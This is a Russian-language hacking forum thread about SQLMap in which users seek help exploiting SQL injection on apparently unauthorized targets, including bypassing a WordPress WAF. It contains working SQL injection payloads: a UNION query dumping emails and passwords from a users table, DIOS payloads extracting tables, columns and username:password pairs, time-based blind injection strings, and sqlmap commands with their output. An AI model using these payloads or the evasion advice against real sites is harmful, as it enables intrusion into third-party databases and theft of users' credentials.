Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    не может быть. Попробуйте поставить *
     
  2. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    52
    Likes Received:
    4
    Reputations:
    0
    Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)
    Но в браузере пишет
    403 Forbidden
    A potentially unsafe operation has been detected in your request to this site
    Как обойти этот WAF мапом?

    Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
     
    #1002 Andrey979, 7 Feb 2020
    Last edited: 7 Feb 2020
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
     
  4. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    52
    Likes Received:
    4
    Reputations:
    0
    У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    В хроме переводчик есть а ещё есть поиск по форуму
     
    Andrey979 likes this.
  6. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    может кто то помочь , привести в виду DIOSa ?


    5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
    ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uBIi

    хотя тут юнион , но при этом выводит 1 запись оч долго
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    может кто то помочь , привести в виду DIOSa ? - Это как?
     
  8. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    как то так

    https://defcon.ru/web-security/2320/

    что бы он не по одной записи "выплевывал"
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Ну, загугли dios mssql.
    п.с может лимит убрать?
     
  10. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    это mysql
    п.с зачем убирать лимит , если https://rdot.org/forum/showthread.php?t=124&page=2

    SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    И как это к sqlmap относиться ?
     
  12. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    392
    Likes Received:
    266
    Reputations:
    3
    Code:
    (select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)  - таблицы
    (select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name={NAME_TABLE_HEX}) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x) - колонки
    (select (@x) from (select (@x:=0x00),(select (0) from ({TABLE_NAME})where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password))))x) - данные
    
    И да не в той теме пост
     
    #1012 karkajoi, 10 Feb 2020
    Last edited: 10 Feb 2020
    Xsite likes this.
  13. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    392
    Likes Received:
    266
    Reputations:
    3
    Можно ли мапой посмотреть размер БД,таблиц,колонок ?
     
    #1013 karkajoi, 15 Feb 2020
    Last edited: 15 Feb 2020
  14. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    90
    Reputations:
    7
    --count
     
  15. yuriy_ivanov

    yuriy_ivanov New Member

    Joined:
    27 Sep 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    та сразу юзай -D ... --columns --count
     
  16. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    392
    Likes Received:
    266
    Reputations:
    3
    Имелось в виду не количество записей в той или оной таблице , а их вес в B,МB
     
  17. NineCent

    NineCent New Member

    Joined:
    4 Nov 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Кто сможет помочь, Акунет нашел скулю слепую.
    • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
    • 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7
    Начинаю крутить Sql map пишу следующее

    тут файл с куками и прочим -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

    Он мне пишет что параметр уязвим.

    [16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable
    it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
    Но потом ничего не находит

    каждый раз когда запускаю снова, выдает результат но уже другой вариант уязвимой версии =\
    Что можно попробовать подскажите пожалуйста.
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    тут файл с куками и прочим -p "service" --dbs --time-sec 5 --risk=3 --level=5
    попробуй так, или установи старую версию sqlmap
     
  19. NineCent

    NineCent New Member

    Joined:
    4 Nov 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Попробовал результат лучше но, теперь сервак выкидывает. Что можно далее предпринять?

    [17:33:11] [INFO] POST parameter 'service' appears to be 'IBM DB2 stacked queries (heavy query - comment)' injectable
    it looks like the back-end DBMS is 'IBM DB2'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
    [17:34:27] [INFO] checking if the injection point on POST parameter 'service' is a false positive
    [17:34:27] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
    [17:34:27] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
    [17:34:27] [WARNING] false positive or unexploitable injection point detected
    [17:34:27] [WARNING] POST parameter 'service' does not seem to be injectable
    [17:34:27] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
     
  20. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    в мапе --current-db ,вроде как текущая база,но что значит текущая? бд домена где скуля или как?
     
Loading...